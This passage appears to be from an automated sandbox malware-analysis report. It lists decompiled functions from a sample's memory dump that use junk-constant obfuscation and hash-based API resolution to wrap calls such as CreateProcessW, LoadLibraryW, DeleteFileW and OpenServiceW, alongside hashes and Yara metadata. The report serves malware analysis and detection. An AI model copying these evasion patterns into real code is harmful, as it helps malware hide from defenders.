                                              • API String ID: 1889721586-3203995635
                                              • Opcode ID: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                              • Instruction ID: b228479d0592d7262c3096c52193cb454ef3b2f27795b4812acf56c9c2036a05
                                              • Opcode Fuzzy Hash: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                              • Instruction Fuzzy Hash: 81016D72A00108BFEB14DF95DC4A8DFBFB6EF45350F108088F508A6250D7B65F619B91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002AC6C7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 58%
                                              			E002AC6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t29;
				intOrPtr* _t33;
				void* _t34;

				E002A602B(_t29);
				_v28 = 0x4fe02f;
				_v24 = 0x232390;
				_v20 = 0xf8460;
				_v16 = 0;
				_v12 = 0xf625;
				_v12 = _v12 >> 6;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 + 0xffffcc6f;
				_v12 = _v12 ^ 0xffffa5b6;
				_v8 = 0xe5cd;
				_v8 = _v8 + 0xffffae4d;
				_v8 = _v8 | 0xf8bbefe7;
				_v8 = _v8 ^ 0xf8bbcc9a;
				_t33 = E002B07A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
				return _t34;
			}












                                              0x002ac6e1
                                              0x002ac6e6
                                              0x002ac6f0
                                              0x002ac6fc
                                              0x002ac703
                                              0x002ac706
                                              0x002ac70d
                                              0x002ac711
                                              0x002ac715
                                              0x002ac71c
                                              0x002ac723
                                              0x002ac72a
                                              0x002ac731
                                              0x002ac738
                                              0x002ac751
                                              0x002ac762
                                              0x002ac768

                                              APIs
                                              • SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 002AC762
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2111128932.00000000002A1000.00000020.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000008.00000002.2111119916.00000000002A0000.00000004.00000001.sdmp Download File
                                              • Associated: 00000008.00000002.2111149588.00000000002BC000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: FolderPath
                                              • String ID: /O
                                              • API String ID: 1514166925-1923427199
                                              • Opcode ID: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
                                              • Instruction ID: 638f793660a12b4e98ad273969b03f6d27cee91c911f0030f67d6bc36e7f7be7
                                              • Opcode Fuzzy Hash: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
                                              • Instruction Fuzzy Hash: 091133B290122DBBCB25DF95DC498EFBFB8EF05754F108188F90962210D7714B659BE0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002A1000, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42libraryCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 82%
                                              			E002A1000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t33;
				struct HINSTANCE__* _t40;
				signed int _t42;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E002A602B(_t33);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x1b2eda;
				_v20 = 0x33a3b7;
				_v12 = 0x98c;
				_v12 = _v12 + 0xb426;
				_v12 = _v12 + 0x5beb;
				_t42 = 0x63;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x00000fce;
				_v8 = 0x120e;
				_v8 = _v8 + 0xfffffcb8;
				_v8 = _v8 + 0xffffefaa;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x07ff9a02;
				E002B07A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
				_t40 = LoadLibraryW(_a12); // executed
				return _t40;
			}











                                              0x002a1006
                                              0x002a1009
                                              0x002a100c
                                              0x002a1011
                                              0x002a1016
                                              0x002a101d
                                              0x002a1026
                                              0x002a102d
                                              0x002a1034
                                              0x002a103b
                                              0x002a1047
                                              0x002a104f
                                              0x002a1057
                                              0x002a105e
                                              0x002a1065
                                              0x002a106c
                                              0x002a1073
                                              0x002a1077
                                              0x002a108b
                                              0x002a1096
                                              0x002a109b

                                              APIs
                                              • LoadLibraryW.KERNEL32(0033A3B7), ref: 002A1096
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2111128932.00000000002A1000.00000020.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000008.00000002.2111119916.00000000002A0000.00000004.00000001.sdmp Download File
                                              • Associated: 00000008.00000002.2111149588.00000000002BC000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: LibraryLoad
                                              • String ID: [
                                              • API String ID: 1029625771-3431493590
                                              • Opcode ID: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
                                              • Instruction ID: 99c32fce244875e02a0d857f7dda1aecb172f19e077cd5849940a0b9e51e4473
                                              • Opcode Fuzzy Hash: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
                                              • Instruction Fuzzy Hash: 4D015BB6D01308BBDF04DFA4C94A5DEBBB1AB54318F108188E51466291D7B19B649B91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002A4859, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E002A4859() {
				signed int _v8;
				signed int _v12;
				void* _t22;

				_v12 = 0xafe2;
				_v12 = _v12 * 0x42;
				_v12 = _v12 + 0xffffdd89;
				_v12 = _v12 ^ 0x002d198d;
				_v8 = 0x5b09;
				_v8 = _v8 | 0xa1ea9544;
				_v8 = _v8 * 0x12;
				_v8 = _v8 ^ 0x6283d9c1;
				E002B07A9(0xc44181ea, 0x9164b7cc, _t22, _t22, 0x1a5);
				ExitProcess(0);
			}






                                              0x002a485e
                                              0x002a487a
                                              0x002a487d
                                              0x002a4884
                                              0x002a488b
                                              0x002a4892
                                              0x002a489d
                                              0x002a48a0
                                              0x002a48ad
                                              0x002a48b7

                                              APIs
                                              • ExitProcess.KERNELBASE(00000000), ref: 002A48B7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2111128932.00000000002A1000.00000020.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000008.00000002.2111119916.00000000002A0000.00000004.00000001.sdmp Download File
                                              • Associated: 00000008.00000002.2111149588.00000000002BC000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: ExitProcess
                                              • String ID: [
                                              • API String ID: 621844428-1822564810
                                              • Opcode ID: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
                                              • Instruction ID: 0f2d7f1d1e070b4223c4fc5f9274b61d5f7acc887405883fdf3895e95ab027cc
                                              • Opcode Fuzzy Hash: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
                                              • Instruction Fuzzy Hash: BEF017B0A15209FBDB04CFE8CA9699EFFB9EB40301F20818CE444B7290E7B15F509B50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002B4F7D, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 32COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 66%
                                              			E002B4F7D(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t17;
				int _t24;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E002A602B(_t17);
				_v12 = 0xddd8;
				_v12 = _v12 * 0x48;
				_v12 = _v12 ^ 0x003e66d8;
				_v8 = 0xcb35;
				_v8 = _v8 ^ 0x7b88573c;
				_v8 = _v8 * 0x59;
				_v8 = _v8 ^ 0xf27e4a21;
				E002B07A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
				_t24 = CloseHandle(_a4); // executed
				return _t24;
			}







                                              0x002b4f80
                                              0x002b4f81
                                              0x002b4f82
                                              0x002b4f86
                                              0x002b4f87
                                              0x002b4f8c
                                              0x002b4fa5
                                              0x002b4fa8
                                              0x002b4faf
                                              0x002b4fb6
                                              0x002b4fc7
                                              0x002b4fca
                                              0x002b4fd7
                                              0x002b4fe2
                                              0x002b4fe7

                                              APIs
                                              • CloseHandle.KERNELBASE(003E66D8), ref: 002B4FE2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2111128932.00000000002A1000.00000020.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000008.00000002.2111119916.00000000002A0000.00000004.00000001.sdmp Download File
                                              • Associated: 00000008.00000002.2111149588.00000000002BC000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: CloseHandle
                                              • String ID: {#lm
                                              • API String ID: 2962429428-1564096886
                                              • Opcode ID: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
                                              • Instruction ID: 65df1366edb39fc32f30dd1a193b2fe8e22f9bc6f5c60b47db0dd0e3de1d45ac
                                              • Opcode Fuzzy Hash: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
                                              • Instruction Fuzzy Hash: 7EF037B081120CFFDB04DFA4D98689EBFBAEB40340F208199E804AB250D7715B50AB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002B976F, Relevance: 1.6, APIs: 1, Instructions: 63processCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 21%
                                              			E002B976F(void* __ecx, struct _PROCESS_INFORMATION* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct _STARTUPINFOW* _a20, int _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52, intOrPtr _a56, WCHAR* _a60, WCHAR* _a68) {
				unsigned int _v8;
				signed int _v12;
				void* _t34;
				int _t39;
				struct _PROCESS_INFORMATION* _t48;

				_push(__ecx);
				_push(__ecx);
				_t48 = __edx;
				_push(0);
				_push(_a68);
				_push(0);
				_push(_a60);
				_push(_a56);
				_push(_a52);
				_push(0);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E002A602B(_t34);
				_v12 = 0xaff9;
				_v12 = _v12 | 0xcee54bd1;
				_v12 = _v12 + 0x6ed6;
				_v12 = _v12 ^ 0xcee61221;
				_v8 = 0x6229;
				_v8 = _v8 ^ 0x42aa9f31;
				_v8 = _v8 >> 2;
				_v8 = _v8 ^ 0x10aad83f;
				E002B07A9(0xf0de9e9f, 0x9164b7cc, __ecx, __ecx, 0x155);
				_t39 = CreateProcessW(_a68, _a60, 0, 0, _a24, 0, 0, 0, _a20, _t48); // executed
				return _t39;
			}








                                              0x002b9772
                                              0x002b9773
                                              0x002b9778
                                              0x002b977a
                                              0x002b977b
                                              0x002b977e
                                              0x002b977f
                                              0x002b9782
                                              0x002b9785
                                              0x002b9788
                                              0x002b9789
                                              0x002b978c
                                              0x002b978f
                                              0x002b9790
                                              0x002b9791
                                              0x002b9794
                                              0x002b9797
                                              0x002b979a
                                              0x002b979d
                                              0x002b97a0
                                              0x002b97a3
                                              0x002b97a6
                                              0x002b97a7
                                              0x002b97a8
                                              0x002b97ad
                                              0x002b97b7
                                              0x002b97c3
                                              0x002b97ca
                                              0x002b97d1
                                              0x002b97d8
                                              0x002b97df
                                              0x002b97e3
                                              0x002b97fc
                                              0x002b9816
                                              0x002b981d

                                              APIs
                                              • CreateProcessW.KERNEL32(002A591A,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,002A591A), ref: 002B9816
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2111128932.00000000002A1000.00000020.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000008.00000002.2111119916.00000000002A0000.00000004.00000001.sdmp Download File
                                              • Associated: 00000008.00000002.2111149588.00000000002BC000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID:
                                              • API String ID: 963392458-0
                                              • Opcode ID: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
                                              • Instruction ID: d07b36f6dd2f4118dd9b7593cfd5843a8c0f02beb87261563ada88c7efbecc89
                                              • Opcode Fuzzy Hash: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
                                              • Instruction Fuzzy Hash: D211D372800148BBDF1A9F92DC0ACDF7F3AEF89750F104048FA1452120D6728A60EBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002AB566, Relevance: 1.6, APIs: 1, Instructions: 55fileCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 31%
                                              			E002AB566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
				unsigned int _v8;
				signed int _v12;
				void* _t32;
				void* _t38;
				long _t47;

				_push(__ecx);
				_push(__ecx);
				_push(_a48);
				_t47 = __edx;
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0);
				E002A602B(_t32);
				_v8 = 0xfd14;
				_v8 = _v8 >> 4;
				_v8 = _v8 * 0x7a;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0x00002bef;
				_v12 = 0x4f26;
				_v12 = _v12 | 0xe7e97f76;
				_v12 = _v12 ^ 0xe7e94dbb;
				E002B07A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
				return _t38;
			}








                                              0x002ab569
                                              0x002ab56a
                                              0x002ab56d
                                              0x002ab572
                                              0x002ab574
                                              0x002ab577
                                              0x002ab57a
                                              0x002ab57d
                                              0x002ab580
                                              0x002ab583
                                              0x002ab586
                                              0x002ab587
                                              0x002ab58a
                                              0x002ab58d
                                              0x002ab590
                                              0x002ab593
                                              0x002ab594
                                              0x002ab595
                                              0x002ab59a
                                              0x002ab5a4
                                              0x002ab5b8
                                              0x002ab5c0
                                              0x002ab5c4
                                              0x002ab5cb
                                              0x002ab5d2
                                              0x002ab5d9
                                              0x002ab5e6
                                              0x002ab5fd
                                              0x002ab604

                                              APIs
                                              • CreateFileW.KERNELBASE(002B0668,?,?,00000000,?,?,00000000,?,?,?,047BBE06,002B0668,?,?,?,?), ref: 002AB5FD
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2111128932.00000000002A1000.00000020.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000008.00000002.2111119916.00000000002A0000.00000004.00000001.sdmp Download File
                                              • Associated: 00000008.00000002.2111149588.00000000002BC000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID:
                                              • API String ID: 823142352-0
                                              • Opcode ID: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
                                              • Instruction ID: 537f052e03b1853710b083748c3c9d98745d96ae799ab36f45355c58eedb3b4d
                                              • Opcode Fuzzy Hash: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
                                              • Instruction Fuzzy Hash: 8111B272801248BBDF16DF95DD06CEEBF7AFF89314F148198FA1862120D3729A60EB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002B981E, Relevance: 1.5, APIs: 1, Instructions: 43memoryCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 54%
                                              			E002B981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				void* _t22;
				void* _t28;
				void* _t34;
				long _t37;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_t34 = __edx;
				_t37 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E002A602B(_t22);
				_v12 = 0xe68;
				_v12 = _v12 * 0x39;
				_v12 = _v12 ^ 0xd1b1d871;
				_v12 = _v12 ^ 0xd1b2fb7e;
				_v8 = 0x629e;
				_v8 = _v8 + 0xfffff5da;
				_v8 = _v8 | 0xbef7b77b;
				_v8 = _v8 ^ 0xbef79fc3;
				E002B07A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
				return _t28;
			}









                                              0x002b9821
                                              0x002b9822
                                              0x002b9825
                                              0x002b9828
                                              0x002b982a
                                              0x002b982c
                                              0x002b982f
                                              0x002b9832
                                              0x002b9835
                                              0x002b9836
                                              0x002b9837
                                              0x002b983c
                                              0x002b9855
                                              0x002b9858
                                              0x002b985f
                                              0x002b9866
                                              0x002b986d
                                              0x002b9874
                                              0x002b987b
                                              0x002b988e
                                              0x002b989b
                                              0x002b98a2

                                              APIs
                                              • RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00000001,?,?,?,002A87F2,0000CAAE,0000510C,AD82F196), ref: 002B989B
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2111128932.00000000002A1000.00000020.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000008.00000002.2111119916.00000000002A0000.00000004.00000001.sdmp Download File
                                              • Associated: 00000008.00000002.2111149588.00000000002BC000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateHeap
                                              • String ID:
                                              • API String ID: 1279760036-0
                                              • Opcode ID: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
                                              • Instruction ID: 77a7ed60376960677dfcd9edda5bb1d35bd25666ffbf56bdbd588131818d1c5c
                                              • Opcode Fuzzy Hash: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
                                              • Instruction Fuzzy Hash: 0F019A72801208FBDB04EFE5DC46CDFBF79EF85350F108188F918A6220E6715B619BA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002B7BF4, Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 62%
                                              			E002B7BF4(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				void* _t24;
				int _t31;
				signed int _t33;
				struct _SHFILEOPSTRUCTW* _t40;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_t40 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E002A602B(_t24);
				_v8 = 0xa117;
				_t33 = 0x76;
				_v8 = _v8 / _t33;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x210fe703;
				_v8 = _v8 ^ 0x210fdcea;
				_v12 = 0xf1e9;
				_v12 = _v12 << 9;
				_v12 = _v12 ^ 0x01e3a445;
				E002B07A9(0x6b98377a, 0xd39e34db, _t33, _t33, 0x219);
				_t31 = SHFileOperationW(_t40); // executed
				return _t31;
			}









                                              0x002b7bf7
                                              0x002b7bf8
                                              0x002b7bfa
                                              0x002b7bfd
                                              0x002b7bff
                                              0x002b7c02
                                              0x002b7c06
                                              0x002b7c07
                                              0x002b7c0f
                                              0x002b7c1d
                                              0x002b7c25
                                              0x002b7c2d
                                              0x002b7c31
                                              0x002b7c38
                                              0x002b7c3f
                                              0x002b7c46
                                              0x002b7c4a
                                              0x002b7c5e
                                              0x002b7c67
                                              0x002b7c6d

                                              APIs
                                              • SHFileOperationW.SHELL32(68CF93E9,?,?,?,?,?,?), ref: 002B7C67
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2111128932.00000000002A1000.00000020.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000008.00000002.2111119916.00000000002A0000.00000004.00000001.sdmp Download File
                                              • Associated: 00000008.00000002.2111149588.00000000002BC000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: FileOperation
                                              • String ID:
                                              • API String ID: 3080627654-0
                                              • Opcode ID: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
                                              • Instruction ID: e675540ff699216bacb546952c39e2567fb1d027674569978ea920fce27eee46
                                              • Opcode Fuzzy Hash: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
                                              • Instruction Fuzzy Hash: 7A014FB190120CFFEB09DFA4C84A8DEBBB5EF45314F108198F50567240EBB15F609B91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002AF65F, Relevance: 1.5, APIs: 1, Instructions: 40serviceCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 52%
                                              			E002AF65F(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16, intOrPtr _a20) {
				unsigned int _v8;
				signed int _v12;
				void* _t24;
				void* _t29;
				int _t35;

				_push(__ecx);
				_push(__ecx);
				_push(_a20);
				_t35 = __ecx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E002A602B(_t24);
				_v12 = 0xd5a7;
				_v12 = _v12 ^ 0x994cba9d;
				_v12 = _v12 ^ 0x994c19d3;
				_v8 = 0xac88;
				_v8 = _v8 << 3;
				_v8 = _v8 >> 8;
				_v8 = _v8 + 0xebed;
				_v8 = _v8 ^ 0x0000ab82;
				E002B07A9(0x1b506617, 0x2c3ac9a2, __ecx, __ecx, 0x18c);
				_t29 = OpenServiceW(_a16, _a12, _t35); // executed
				return _t29;
			}








                                              0x002af662
                                              0x002af663
                                              0x002af665
                                              0x002af668
                                              0x002af66a
                                              0x002af66d
                                              0x002af670
                                              0x002af673
                                              0x002af677
                                              0x002af678
                                              0x002af67d
                                              0x002af687
                                              0x002af693
                                              0x002af69a
                                              0x002af6a1
                                              0x002af6a5
                                              0x002af6a9
                                              0x002af6b0
                                              0x002af6c9
                                              0x002af6d8
                                              0x002af6de

                                              APIs
                                              • OpenServiceW.ADVAPI32(BB1E804F,0000AB81,A536EF12), ref: 002AF6D8
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2111128932.00000000002A1000.00000020.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000008.00000002.2111119916.00000000002A0000.00000004.00000001.sdmp Download File
                                              • Associated: 00000008.00000002.2111149588.00000000002BC000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: OpenService
                                              • String ID:
                                              • API String ID: 3098006287-0
                                              • Opcode ID: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
                                              • Instruction ID: b0446ff2d6295519c73a3ca86446cb3658931a0c82ef6f51e52b865abbf4dc43
                                              • Opcode Fuzzy Hash: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
                                              • Instruction Fuzzy Hash: A401E5B6901208BBEF059F94DC4A8DFBF75EB05364F148188F91462250D6B25E61EBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002AB6DD, Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 58%
                                              			E002AB6DD(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				void* _t23;
				intOrPtr* _t27;
				void* _t28;

				E002A602B(_t23);
				_v12 = 0x9431;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x0000160f;
				_v8 = 0xc972;
				_v8 = _v8 ^ 0x829e0126;
				_v8 = _v8 + 0x4512;
				_v8 = _v8 + 0xffff18f9;
				_v8 = _v8 ^ 0x829e24c1;
				_t27 = E002B07A9(0x6460e96, 0x9164b7cc, __ecx, __ecx, 0x114);
				_t28 =  *_t27(_a8, 0, _a16, 0x28, 0, __edx, 0x28, _a8, _a12, _a16, _a20, __ecx, __ecx); // executed
				return _t28;
			}








                                              0x002ab6f3
                                              0x002ab6f8
                                              0x002ab702
                                              0x002ab70b
                                              0x002ab712
                                              0x002ab719
                                              0x002ab720
                                              0x002ab727
                                              0x002ab72e
                                              0x002ab747
                                              0x002ab759
                                              0x002ab75e

                                              APIs
                                              • SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 002AB759
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2111128932.00000000002A1000.00000020.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000008.00000002.2111119916.00000000002A0000.00000004.00000001.sdmp Download File
                                              • Associated: 00000008.00000002.2111149588.00000000002BC000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: FileHandleInformation
                                              • String ID:
                                              • API String ID: 3935143524-0
                                              • Opcode ID: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
                                              • Instruction ID: c51acb9c0946fd456ff27fcbf4487c317e9e481283019b4def1c4b94d8651493
                                              • Opcode Fuzzy Hash: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
                                              • Instruction Fuzzy Hash: 2E018FB194030CFBEF45DF90DD06E9EBBB5EF04704F108188FA0526190D7B15E20AB51
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002BAA3C, Relevance: 1.5, APIs: 1, Instructions: 34fileCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 58%
                                              			E002BAA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				signed int _v8;
				unsigned int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E002A602B(_t21);
				_v12 = 0xcc49;
				_v12 = _v12 << 6;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0x000ca988;
				_v8 = 0x5d85;
				_v8 = _v8 | 0xb9d19a55;
				_v8 = _v8 * 0xd;
				_v8 = _v8 ^ 0x6fa87272;
				E002B07A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
				_t27 = DeleteFileW(_a12); // executed
				return _t27;
			}







                                              0x002baa3f
                                              0x002baa40
                                              0x002baa41
                                              0x002baa44
                                              0x002baa47
                                              0x002baa4b
                                              0x002baa4c
                                              0x002baa51
                                              0x002baa5b
                                              0x002baa64
                                              0x002baa68
                                              0x002baa6f
                                              0x002baa76
                                              0x002baa8d
                                              0x002baa90
                                              0x002baa9d
                                              0x002baaa8
                                              0x002baaad

                                              APIs
                                              • DeleteFileW.KERNELBASE(?,?,?,?,A6E18774,?,?), ref: 002BAAA8
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2111128932.00000000002A1000.00000020.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000008.00000002.2111119916.00000000002A0000.00000004.00000001.sdmp Download File
                                              • Associated: 00000008.00000002.2111149588.00000000002BC000.00000004.00000001.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID: DeleteFile
                                              • String ID:
                                              • API String ID: 4033686569-0
                                              • Opcode ID: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
                                              • Instruction ID: 7a2db7db2feef5d49288eb0af1dd66c3d059532745613c57d2bf4b73e80d59b0
                                              • Opcode Fuzzy Hash: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
                                              • Instruction Fuzzy Hash: F0F069B191020CFFDF08DFA4DD4A89EBFB4EB41304F108088F915A6250D7B29B649B50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002A5FB2, Relevance: 1.5, APIs: 1, Instructions: 33serviceCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 70%
                                              			E002A5FB2(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E002A602B(_t21);
				_v12 = 0x33d;
				_v12 = _v12 + 0xc3dc;
				_v12 = _v12 | 0x39ccfb02;
				_v12 = _v12 ^ 0x39ccf342;
				_v8 = 0xe8d9;
				_v8 = _v8 * 0x16;
				_v8 = _v8 | 0x4145347f;
				_v8 = _v8 ^ 0x9035ef96;
				_v8 = _v8 ^ 0xd1609914;
				E002B07A9(0x6b3db31e, 0x2c3ac9a2, __ecx, __ecx, 0x1d5);
				_t27 = CloseServiceHandle(_a4); // executed
				return _t27;
			}







                                              0x002a5fb5
                                              0x002a5fb6
                                              0x002a5fb7
                                              0x002a5fbb
                                              0x002a5fbc
                                              0x002a5fc1
